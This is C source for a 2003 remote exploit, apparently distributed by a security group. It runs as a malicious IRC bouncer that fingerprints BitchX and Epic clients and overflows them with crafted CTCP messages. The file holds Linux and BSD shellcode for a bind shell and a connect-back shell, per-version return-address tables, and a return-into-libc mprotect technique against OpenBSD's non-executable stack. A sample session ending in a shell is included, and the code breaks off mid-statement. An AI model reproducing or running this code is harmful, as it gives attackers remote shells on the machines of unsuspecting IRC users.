/* _ ________ _____ ______ 06-03-2 003 __ ___ ____ /____.------` /_______.------.___.----` ___/____ ____ ___ _/ \ _ /\ __. __// ___/_ ___. /_\ /_ | _/ ___ ._\ . \\ /__ _____/ _ / \_ | /__ | _| slc | _____ _ - -------\______||--._____\---._______//-|__ //-.___|----._____|| / \ / remote BitchX/Epic Exploit (serverside) \/ by eSDee of Net ric ----------------------------------------------------------------------------- --- (www.netric.be|o rg) "gespuis.c" is an irc bouncer, that can exploit BitchX/Epic clients. Copyright (c) 2003 Netric Security All rights reserved. [esdee@flopppp]$ ./gespuis -v irc.netric.org [remote BitchX/Epic exploit (serverside) by eSDee of Netric (www.netric.be|or g)] ----------------------------------------------------------------------------- --- Verbose mode. Waiting for connections... [10.0.0.2] Connected... [esdee] [10.0.0.2] Sending CTCP VERSION... [10.0.0.2] Client version: BitchX-1.0c17+ by panasync - OpenBSD 3.2 [10.0.0.2] Target found. [ret: 0xcfbf7c1c] [10.0.0.2] Bindshell is running on port 0xb0ef(45295). [esdee@flopppp]$ telnet 10.0.0.2 45295 Trying 10.0.0.2... Connected to 10.0.0.2. Escape character is '^]'. uname -a; id; OpenBSD pant0ffel 3.2 pant0ffel#1 i386 uid=1000(esdee) gid=1000(esdee) groups=1000(esdee), 0(wheel) */ #include #include #include #include #include #include #include #include #include #include #include #include #include char jmp_code[] = /* jumps 0xff bytes ahead.. */ "\xeb\x09\x58\x31\xdb\xb3\xff\x01\xd8\xff\xe0\xe8\xf2\xff\xff\xff"; char BSD_bindcode[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* forking bindcode (port 0xb0ef)*/ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02" "\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80" "\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57" "\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89" "\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50" "\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80" "\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56" "\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd" "\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b" "\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80" "\xeb\x9a"; char BSD_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68\x2d\x63\x89\xe3\x50" "\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50\x89\xe1\x31\xc0\x50" "\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68\x54\x45\x52\x4d\x89" "\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62" "\x69\x89\xe3\x50\x52\x51\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0" "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef" "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0" "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80" "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52" "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31" "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54" "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"; char linux_bindcode[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* forking bindcode (port 0xb0ef)*/ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50" "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02" "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05" "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd" "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd" "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80" "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0" "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80" "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24" "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0" "\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; char linux_connect_back[] = /* fork(), execve sh -c [client] [host to bounce to], term=xterm */ "\x31\xc0\x31\xff\xb0\x02\xcd\x80\x39\xc7\x74\x7e\x31\xc0\x50" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20" "\x68\x20\x20\x20\x20\x68\x20\x20\x20\x20\x89\xe1\x50\x66\x68" "\x2d\x63\x89\xe3\x50\x66\x68\x73\x68\x89\xe0\x57\x51\x53\x50" "\x89\xe1\x31\xc0\x50\x66\x68\x72\x6d\x68\x3d\x78\x74\x65\x68" "\x54\x45\x52\x4d\x89\xe2\x50\x52\x89\xe2\x57\x68\x6e\x2f\x73" "\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80" /* connect back shellcode (port=0xb0ef) */ "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51" "\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3" "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1" "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f" "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" "\x01\xcd\x80"; struct { char *version; unsigned long ret; unsigned long mprotect; char *shellcode; int type; } targets[] = { /* FreeBSD targets tested on: - FreeBSD 4.7-RELEASE-p3 - FreeBSD 4.6.2-RELEASE - FreeBSD 4.6 - FreeBSD 4.5-RELEASE OpenBSD targets: - OpenBSD 3.2 - OpenBSD 3.1 - OpenBSD 3.0 - OpenBSD 2.x Linux targets: - Redhat 8.0 - Redhat 7.x - Debian 3.0 - Mandrake 8.x - Mandrake 9.0 - Slackware 8.x - Trustix 1.x Types: 0 - BitchX (Linux) 1 - BitchX (BSD) 2 - BitchX (BSD - Return into libc - mprotect() (To break the k-rad theo protection :) 3 - Epic (Linux) 4 - Epic (BSD) 5 - Epic (BSD - Return into libc - mprotect()) */ /* Auto targets */ { "BitchX-1.0c19+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c18+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c17+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c16+ by panasync - Linux 2.", 0xbfff9bd8, 0x00000000, linux_bindcode, 0}, { "BitchX-1.0c19+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - FreeBSD 5", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - FreeBSD 4", 0xbfbf9c8c, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ec230, BSD_bindcode, 2}, { "BitchX-1.0c18+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401ce230, BSD_bindcode, 2}, { "BitchX-1.0c17+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230, BSD_bindcode, 2}, { "BitchX-1.0c16+ by panasync - OpenBSD 3.2", 0xcfbf7c1c, 0x401cb230, BSD_bindcode, 2}, { "BitchX-1.0c19+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - OpenBSD 3", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c19+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c18+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c17+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "BitchX-1.0c16+ by panasync - OpenBSD 2", 0xdfbf7f34, 0x00000000, BSD_bindcode, 1}, { "ircII EPIC4-1.1.10 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.7 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.6 Linux 2.", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.10 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.7 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.6 FreeBSD 4", 0xbfbfdf64, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.10 OpenBSD 3.2", 0xcfbf6d74, 0x4026b230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.7 OpenBSD 3.2", 0xcfbfbe64, 0x40265230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.6 OpenBSD 3.2", 0xcfbfbe64, 0x40264230, BSD_bindcode, 5}, { "ircII EPIC4-1.1.10 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.7 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, { "ircII EPIC4-1.1.6 OpenBSD 3", 0xdfbf7094, 0x00000000, BSD_bindcode, 4}, /* manual targets (thanks lucipher and thorax!) */ { "BitchX-1.0cX - Redhat 8.0", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Redhat 7.x", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Debian 3.x", 0xbfff9f0c, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Mandrake 9.0", 0xbfff9af0, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Mandrake 8.x", 0xbfff9af0, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Slackware 8.x", 0xbfff9bd8, 0x00000000, linux_bindcode, 1}, { "BitchX-1.0cX - Trustix 1.x", 0x7fff9ddc, 0x00000000, linux_bindcode, 1}, { "ircII EPIC4-1.1.x Redhat 8.0", 0xbfffdf64, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Redhat 7.x", 0xbfffdf64, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Debian 3.x", 0xbfff9004, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Mandrake 9.0", 0xbfffdf10, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Mandrake 8.x", 0xbfffdf10, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Slackware 8.x", 0xbfffddf0, 0x00000000, linux_bindcode, 3}, { "ircII EPIC4-1.1.x Trustix 1.x", 0x7fff8f74, 0x00000000, linux_bindcode, 3}, { "Crash - All platforms", 0xBADe5Dee, 0x00000000, linux_bindcode, 0}, }; FILE *log = NULL; void usage(char *prog) { fprintf(stderr, "Usage : %s [-c ip address] [-l file] [-p port] [-t ta rget] [-v] \n" "Example: %s -l /var/log/owned -p 6667 -v irc.netric.or g:6668\n\n" "-c ip address connect back shellcode (port 4 5295)\n" "-l logfile log output to file\n" "-p port the bouncer port\n" "-t target force target, don't CTCP versi on. (Use -t0 for a list)\n" "-v verbose mode\n\n", prog, prog) ; exit(1); } int send_text(int sock, char *format, ... ) { char buffer[4096]; va_list arglist; va_start (arglist, format); vsnprintf(buffer, sizeof(buffer) - 1, format, arglist ); va_end(arglist); return send(sock, buffer, strlen(buffer), 0); } int main(int argc, char *argv[]) { char read_buf [4096]; char log_buffer [1200]; char ret_buffer [128]; char buffer [600]; char sh_buffer [2000]; char sh_host [36]; char version [256]; char nick [256]; char user [256]; char ircd_host [256]; char *ptr; unsigned int port = 6667; unsigned int ircd_port = 6667; unsigned int type = 0; unsigned int bytes = 0; struct sockaddr_in saddr_in1; struct sockaddr_in saddr_in2; struct sockaddr_in saddr_in3; struct hostent *hp; int sock_server = 0; int sock_server_new = 0; int sock_ircd = 0; int sin_size = sizeof(struct sockaddr_in); int i = 0; int k = 0; int size = 0; int opt = 0; int verbose = 0; int connectback = 0; int ip1 = 0; int ip2 = 0; int ip3 = 0; int ip4 = 0; fd_set fd_read; fprintf(stdout, "[remote BitchX/Epic exploit (serverside) by eSDee of N etric (www.netric.be|org)]\n" "------------------------------------------------------ --------------------------\n"); while((opt = getopt(argc,argv,"c:l:p:t:v")) !=EOF) { switch(opt) { case 'c': sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4); linux_connect_back[171] = ip1; BSD_connect_back [162] = ip1; linux_connect_back[172] = ip2; BSD_connect_back [163] = ip2; linux_connect_back[173] = ip3; BSD_connect_back [164] = ip3; linux_connect_back[174] = ip4; BSD_connect_back [165] = ip4; for(i = 0; i < sizeof(targets) / 20; i++) { switch(targets[i].type) { case 0: targets[i].shellcode = linux_connect_back; break; case 3: targets[i].shellcode = linux_connect_back; break; default: targets[i].shellcode = BSD_connect_back; break; } } fprintf(stdout, "Connecting to: %d.%d.%d.%d:452 95\n", ip1, ip2, ip3, ip4); connectback = 1; break; case 'l': if ((log = fopen(optarg,"aw")) == NULL) { fprintf(stderr, "Unable to open %s.\n", optarg); return -1; } break; case 'p': port=atoi(optarg); if ((port <= 0) || (port > 65535)) { fprintf(stderr,"Invalid port.\n"); return -1; } break; case 't': type = atoi(optarg); if (type == 0 || type > sizeof(targets) / 20) { for(i = 0; i < sizeof(targets) / 20; i ++) fprintf(stderr, "%02d. [0x%08x] - %s\n", i + 1, (unsigned)targets[i].re t, targets[i].version); fprintf(stderr, "\n"); return -1; } fprintf(stdout, "Selected: %s [0x%08x]\n", targ ets[type - 1].version, (unsigned)targets[type - 1].ret); break; case 'v': fprintf(stdout, "Verbose mode.\n"); verbose = 1; break; default: usage(argv[0] == NULL ? "gespuis" : argv[0]); break; } } if (argv[optind] == NULL) usage(argv[0] == NULL ? "gespuis" : argv[0]); sscanf(argv[optind], "%255[^:]:%u", ircd_host, &ircd_port); if ((ircd_port <= 0) || (ircd_port > 65535)) { fprintf(stderr,"Invalid ircd port.\n"); return -1; } if ((hp = gethostbyname(ircd_host)) == NULL) { fprintf(stderr, "Unable to resolve %s...\n", ircd_host); return -1; } memset((char *)&saddr_in3, 0x0, sizeof(saddr_in3)); memcpy((char *)&saddr_in3.sin_addr, hp->h_addr, hp->h_length); saddr_in3.sin_family = AF_INET; saddr_in3.sin_port = htons(ircd_port); if ((sock_server = socket(AF_INET, SOCK_STREAM, 0)) == -1) { fprintf(stderr, "socket error.\n"); return -1; } setsockopt(sock_server, SOL_SOCKET, SO_REUSEADDR, &sin_size, sizeof(sin _size)); saddr_in1.sin_family = AF_INET; saddr_in1.sin_port = htons(port); saddr_in1.sin_addr.s_addr = INADDR_ANY; memset(&saddr_in1.sin_zero, 0x0, 8); if (bind(sock_server, (struct sockaddr *)&saddr_in1, sizeof(struct sock addr)) == -1) { fprintf(stderr, "bind error.\n"); return -1; } if (listen(sock_server, 10) == -1) { fprintf(stderr, "listen.\n"); return -1; } signal(SIGCHLD, SIG_IGN); fprintf(stdout, "Waiting for connections...\n"); while(1) { if ((sock_server_new = accept(sock_server, (struct sockaddr *)&saddr_in 2, &sin_size)) == -1) { perror("accept"); continue; } if (!fork()) { close(sock_server); memset(version, 0x0, sizeof(version)); memset(read_buf, 0x0, sizeof(read_buf)); while(1) { if (recv(sock_server_new, read_buf, sizeof(read _buf) - 1, 0) < 0) { close(sock_server_new); exit(1); } ptr = strstr(read_buf, "NICK "); if (ptr != NULL) { memset(nick, 0x00, sizeof(nick)); strncpy(nick, ptr + 5, sizeof(nick) - 1 ); for (i = 0; i < strlen(nick); i++) if(!isprint(nick[i])) nick[i] = 0x00; if (verbose == 1) fprintf(stdout, "[%s] Connected... [%s]\n", inet_nt oa(saddr_in2.sin_addr), nick); } ptr = strstr(read_buf, "USER "); if (ptr != NULL) { memset(user, 0x00, sizeof(user)); strncpy(user, ptr + 5, sizeof(user) - 1 ); for (i = 0; i < strlen(user); i++) if (!isprint(user[i])) user[i] = 0x00; } if (strlen(nick) != 0 && strlen(user) != 0) bre ak; memset(read_buf, 0x0, sizeof(read_buf)); } if (type == 0) { if (verbose == 1) fprintf(stdout, "[%s] Sending CTCP VERSION...\n", inet_ntoa(saddr_in2.sin_addr)); if (send_text(sock_server_new, ":stats!netric@n etric.org PRIVMSG a: %cVERSION%c\n", 0x01, 0x01) < 0) { if (verbose == 1) fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr)); close(sock_server_new); exit(1); } while(1) { if (recv(sock_server_new, read_buf, siz eof(read_buf) - 1, 0) < 0) { close(sock_server_new); exit(1); } ptr = strstr(read_buf, "VERSION "); if (ptr != NULL) { for (i = 0; i < sizeof(version) - 1; i++) { if (isprint(*(ptr + i + 8))) { version[k] = *( ptr + i + 8); k++; } if (*(ptr + i + 8) == ' :' && *(ptr + i + 7) == ' ') { version[k - 2] = 0x00; break; } if (*(ptr + i + 8) == '-' && *(ptr + i + 9) == ' ' && *(ptr + i + 10) == 'A' && *(ptr + i + 11) == 'c') { version[k - 2] = 0x00; break; } } if (verbose == 1) fprintf(stdou t, "[%s] Client version: %s\n", inet_ntoa(saddr_in2.sin_addr), version); break; } memset(read_buf, 0x0, sizeof(read_buf)) ; } if (strlen(version) == 0) { if (verbose == 1) fprintf(stderr, "[%s] No vers ion given.\n", inet_ntoa(saddr_in2.sin_addr)); close(sock_server_new); exit(1); } for(i = 0; i < (sizeof(targets) / 20) - 1; i++) { if (memcmp(version, targets[i].version, strlen(targets[i].version)) == 0) { type = i + 1; if (verbose == 1) fprintf(stder r, "[%s] Target found. [ret: 0x%08x]\n", inet_ntoa(saddr_in2.sin _addr), (unsigned) targets[type - 1].ret); break; } } if (type == 0) { if (verbose == 1) fprintf(stderr, "[%s] Not found, bouncing to [%s:%u] ...\n", inet_ntoa(saddr_in2.sin_addr), ircd_host, ircd_port); if ((sock_ircd = socket(AF_INET, SOCK_S TREAM, 0)) == -1) { if (verbose == 1) fprintf(stder r, "[%s] socket error.\n", inet_ntoa(saddr_in2.sin _addr)); close(sock_server_new); exit(1); } if (connect(sock_ircd, (struct sockaddr *)&saddr_in3, sizeof(saddr_in3)) == -1) { if (verbose == 1) fprintf(stder r, "[%s] Unable to connect to [%s:%u].\n", inet_ntoa(saddr_in2.sin _addr), ircd_host, ircd_port); close(sock_server_new); close(sock_ircd); exit(1); } memset(log_buffer, 0x00, sizeof(log_buf fer)); snprintf(log_buffer, sizeof(log_buffer) - 1, "NICK %s\nUSER %s\n", nick, use r); if (send(sock_ircd, log_buffer, strlen( log_buffer), 0) < 0) { close(sock_server_new); close(sock_ircd); exit(1); } memset(read_buf, 0x00, sizeof(read_buf) ); bytes = 1; while (bytes) { FD_ZERO(&fd_read); FD_SET(sock_server_new, &fd_rea d); FD_SET(sock_ircd, &fd_read); select(FD_SETSIZE, &fd_read, NU LL, NULL, NULL); if (FD_ISSET(sock_ircd, &fd_rea d)) { memset(read_buf, 0x00, sizeof(read_buf)); bytes = recv(sock_ircd, read_buf, sizeof(read_buf), 4); if (bytes) send(sock_se rver_new, read_buf, bytes, 4); } else if (FD_ISSET(sock_server _new, &fd_read)) { memset(&read_buf, 0x00, sizeof(read_buf)); bytes = recv(sock_serve r_new, read_buf, sizeof(read_buf), 4); if (bytes) send(sock_ir cd, read_buf, bytes, 4); } } close(sock_ircd); close(sock_server_new); exit(1); } } k = 69; i = 0; memset(sh_host, 0x00, sizeof(sh_host)); if (targets[type - 1].type < 3) { snprintf(sh_host, sizeof(sh_host) - 1, "BitchX %s:%d", ircd_host, ircd_port); } else { snprintf(sh_host, sizeof(sh_host) - 1, "epic %s :%d", ircd_host, ircd_port); } strncat(sh_host, " " , sizeof(sh_host) - strlen(sh_host) - 1) ; while (1) { if (sh_host[i + 0] == 0x00) break; linux_bindcode[k - 3] = sh_host[i + 0]; linux_connect_back[k - 3] = sh_host[i + 0]; if (sh_host[i + 1] == 0x00) break; linux_bindcode[k - 2] = sh_host[i + 1]; linux_connect_back[k - 2] = sh_host[i + 1]; if (sh_host[i + 2] == 0x00) break; linux_bindcode[k - 1] = sh_host[i + 2]; linux_connect_back[k - 1] = sh_host[i + 2]; if (sh_host[i + 3] == 0x00) break; linux_bindcode[k - 0] = sh_host[i + 3]; linux_connect_back[k - 0] = sh_host[i + 3]; k -= 5; i += 4; } k = 64; i = 0; while (1) { if (sh_host[i + 0] == 0x00) break; BSD_bindcode[k - 3] = sh_host[i + 0]; BSD_connect_back[k - 3] = sh_host[i + 0]; if (sh_host[i + 1] == 0x00) break; BSD_bindcode[k - 2] = sh_host[i + 1]; BSD_connect_back[k - 2] = sh_host[i + 1]; if (sh_host[i + 2] == 0x00) break; BSD_bindcode[k - 1] = sh_host[i + 2]; BSD_connect_back[k - 1] = sh_host[i + 2]; if (sh_host[i + 3] == 0x00) break; BSD_bindcode[k - 0] = sh_host[i + 3]; BSD_connect_back[k - 0] = sh_host[i + 3]; k -= 5; i += 4; } k = 0; usleep(3000000); /* We have to wait a couple of seconds, otherwise BitchX/Epic will i gnore the clientinfo CTCP. */ memset(sh_buffer, 0x90, sizeof(sh_buffer)); memcpy(sh_buffer + sizeof(sh_buffer) - 1 - strlen(targe ts[type - 1].shellcode), targets[type - 1].shellcode, strlen(targets[typ e - 1].shellcode)); sh_buffer[sizeof(sh_buffer) - 1] = 0x0; if (send_text(sock_server_new, ":netric!netric@netric.o rg PRIVMSG a: %s\r\n", sh_buffer) < 0) { if (verbose == 1) fprintf(stderr, "[%s] send fa iled!\n", inet_ntoa(saddr_in2.sin_addr)); exit(1); } usleep(300000); if (targets[type - 1].type == 2 || targets[type - 1].ty pe == 5) { /* OpenBSD 3.2! Quote: "As theo announced on misc@, non-executable sta ck support is available in the most recent snapshots for most platforms. In other words, say goodbye to the vast majority of buffer overflow attacks against OpenBSD mac hines :-) " The stack is non executable at default, so we use a return into libc technic, to get the stack executable again. We use the mprotect() function in libc, to mark the stack PROT_WRITE|PROT_READ|PROT_EX EC ;) */ size = -1; memset(ret_buffer, 0x90, sizeof(ret_buffer)); memcpy(ret_buffer + 28, &targets[type - 1].mpro tect, 4); memcpy(ret_buffer + 32, &targets[type - 1].ret, 4); memcpy(ret_buffer + 36, &targets[type - 1].ret, 4); // void *addr memcpy(ret_buffer + 40, &size, 4); // size_t len ret_buffer[44] = 0x07; // int prot ret_buffer[200] = 0x00; } else { memset(ret_buffer, 0x0, sizeof(ret_buffer)); for(i = 0; i < sizeof(ret_buffer) - 4; i += 4) { ret_buffer[i + 0] = (targets[type - 1]. ret >> 0) & 0xff; ret_buffer[i + 1] = (targets[type - 1]. ret >> 8) & 0xff; ret_buffer[i + 2] = (targets[type - 1]. ret >> 16) & 0xff; ret_buffer[i + 3] = (targets[type - 1]. ret >> 24) & 0xff; } } memset(buffer, 0x90, sizeof(buffer)); memcpy(buffer - sizeof(jmp_code) - 2, jmp_code, sizeof( jmp_code) - 1); buffer[sizeof(buffer) - 1] = 0x00; if (send_text(sock_server_new, ":%s!netric@netric.org PRIVMSG a: %cCLIENTINFO %s%c\r\n", buffer, 0x01, ret_buffer, 0x01) < 0) { if (verbose == 1) { fprintf(stderr, "[%s] send failed!\n", inet_ntoa(saddr_in2.sin_addr)); exit(1); } } if (connectback == 0) { if (log) fprintf(log, "[%s] %s - Bindshell is r unning on port 0xb0ef(45295).\n", inet_ntoa(saddr_in2.sin_addr), nick); fprintf(stderr, "[%s] Bindshell is running on p ort 0xb0ef(45295).\n", inet_ntoa(saddr_in2.sin_addr)); } else { if (log) fprintf(log, "[%s] %s - Connecting to %d.%d.%d.%d:45295.\n", inet_ntoa(saddr_in2.sin_addr), nick, ip 1, ip2, ip3, ip4); fprintf(stderr, "[%s] Connecting to %d.%d.%d.%d 